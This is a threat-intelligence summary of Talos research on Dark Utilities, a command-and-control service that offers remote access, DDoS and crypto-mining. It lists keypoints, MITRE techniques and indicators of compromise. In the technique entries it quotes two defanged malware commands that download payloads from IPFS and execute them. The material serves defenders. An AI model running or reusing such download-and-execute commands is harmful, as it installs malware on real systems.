Dark Utilities is a C2-as-a-Service platform released in early 2022 that provides remote access, DDoS, and cryptocurrency mining capabilities, with payloads for Windows, Linux, and Python hosted on IPFS to resist takedowns. Since launch, malware samples have rapidly begun using the platform for C2 and remote access on infected systems. #DarkUtilities #Inplex-sys
Keypoints
- Dark Utilities offers a versatile, low-cost C2 framework that supports Windows, Linux, and Python payloads and is hosted on IPFS, enabling resilience against takedowns.
- Operators have built Discord and Telegram communities for support, and the platform markets premium access for 9.99 euros, attracting thousands of users and generating notable income.
- Malware samples were observed using Dark Utilities soon after launch to establish C2 channels and remote access on Windows and Linux targets.
- The platform includes a centralized Manager panel with modules for DDoS (Layer 4 and Layer 7), cryptocurrency mining, and distributed command execution across compromised hosts.
- IPFS-based hosting and gateways provide βbulletproof hostingβ advantages, while Tor2Web gateways enable C2 communication without a Tor client.
- Dark Utilities appears to be driven by the Inplex-sys persona, with connections to other projects and actors (e.g., Lapsus$); activity spans Discord, Telegram, Steam ads, and other platforms.
- Payload analysis shows Python-based malware compiled to Windows PE and Linux ELF, with persistence through Registry Run Keys (Windows) or Crontab/Systemd (Linux), and stage-based delivery via IPFS.
MITRE Techniques
- [T1059.001] PowerShell β The admin panel provides an interactive PowerShell prompt used to execute commands on compromised hosts. βAn interactive PowerShell prompt is provided directly within the admin panel.β
- [T1059.004] Bash β Linux payload retrieval and execution use Bash scripting (e.g., βcd /tmp/;curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmVwqSG7TGceZJ6MWnKgYkiyqnW4qTTRq61ADDfMJaPEoG > ./tcp-client;chmod +x tcp-client; ./tcp-client [ACCOUNT_STRING_PARAMETER]β).
- [T1547.001] Registry Run Keys/Startup Folder β Windows persistence by creating a Registry Run key. βIf Windows, the malware will create a Registry run key, as shown below.β
- [T1053.005] Cron β Linux persistence via Crontab entries. βIt will then create either a Crontab entry or a Systemd service to ensure that the payload is launched following system reboots.β
- [T1543.003] Create or Modify Systemd Services β Linux persistence via Systemd service creation. ββ¦or a Systemd service to ensure that the payload is launched following system reboots.β
- [T1105] Ingress Tool Transfer β Retrieval of payloads via IPFS gateways (downloading payloads to execute). βcurl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmRLaPCGa2HZTxMPQxU2VnB9qda3mUv21TXrjbMNqkxN6Z >> launcher.exe && .launcher.exe [ACCOUNT_STRING_PARAMETER]β
Indicators of Compromise
- [Hash] context β 09fd574a005f800e6eb37d7e2a3ca640d3ac3ac7dbbde42cbe85aa9e877c1f7f, 0a351f3c9fb0add1397a8e984801061ded0802a3c45d9a5fc7098e806011a464, and 2 more hashes
- [Domain] context β dark-utilities.xyz, dark-utilities.pw, and 1 more domain
- [IPFS Gateway] context β ipfs.infura.io, ipfs.infura-ipfs.io
- [Onion Domain] context β dark-utilities.onion.pet
Read more: https://blog.talosintelligence.com/2022/08/dark-utilities.html